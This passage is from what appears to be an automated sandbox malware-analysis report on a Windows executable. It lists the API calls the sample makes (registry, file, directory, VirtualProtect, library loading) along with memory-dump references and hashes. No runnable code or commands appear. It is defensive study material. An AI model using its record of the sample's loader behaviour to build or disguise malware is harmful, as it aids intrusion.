                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                  • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                                  • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                  • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                                  APIs
                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseDeleteValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2831762973-0
                                                                                                                  • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                                  • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                                  • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                                  • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$EnableShow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1136574915-0
                                                                                                                  • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                                  • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                                  • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                                  • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                    • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                    • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                    • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2547128583-0
                                                                                                                  • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                  • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                                  • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                  • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\b5BQbAhwVD.exe,80000000,00000003), ref: 00405EE2
                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 415043291-0
                                                                                                                  • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                  • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                  • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                  • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1375471231-0
                                                                                                                  • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                  • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                                  • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                  • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                                  APIs
                                                                                                                  • EnumWindows.USER32(00000000), ref: 72ED2B6B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnumWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1129996299-0
                                                                                                                  • Opcode ID: eb9560cbb8b3cccc9b01fc4c8f5102e4c757ce07fa76d616cb11cf121683fc3c
                                                                                                                  • Instruction ID: fcb66f42895ea7242808c0971f602b64e5105ec0555925843e6749cddd66c659
                                                                                                                  • Opcode Fuzzy Hash: eb9560cbb8b3cccc9b01fc4c8f5102e4c757ce07fa76d616cb11cf121683fc3c
                                                                                                                  • Instruction Fuzzy Hash: FE417076841204DFEB21DFA9E941B5D3B79EB44368FB0CC2AF405C6242D63598C2DB91
                                                                                                                  APIs
                                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileMove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3562171763-0
                                                                                                                  • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                                  • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                                  • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                                  • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                    • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointerwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 327478801-0
                                                                                                                  • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                  • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                                  • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                  • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                                  APIs
                                                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Create
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2289755597-0
                                                                                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                  • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                  • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                  • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                  • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040FD5C,0040CED0,004033DE,0040CED0,0040FD5C,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3934441357-0
                                                                                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                  • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                  • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNELBASE(72ED505C,00000004,00000040,72ED504C), ref: 72ED29B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-0
                                                                                                                  • Opcode ID: f81d1c17841296c0789f0ca376589db12b515687a977e2db9af95ac9f138a026
                                                                                                                  • Instruction ID: 8b532e54303cff67a00e10f5740efb0f8cb818109a30cf591f5556c52867b020
                                                                                                                  • Opcode Fuzzy Hash: f81d1c17841296c0789f0ca376589db12b515687a977e2db9af95ac9f138a026
                                                                                                                  • Instruction Fuzzy Hash: 2BF0AEBAA80281DFD351CF2AA8447193BE8B719305BE08E6EE288DA241E33444C5DB91
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 71445658-0
                                                                                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                  • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                  • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 973152223-0
                                                                                                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
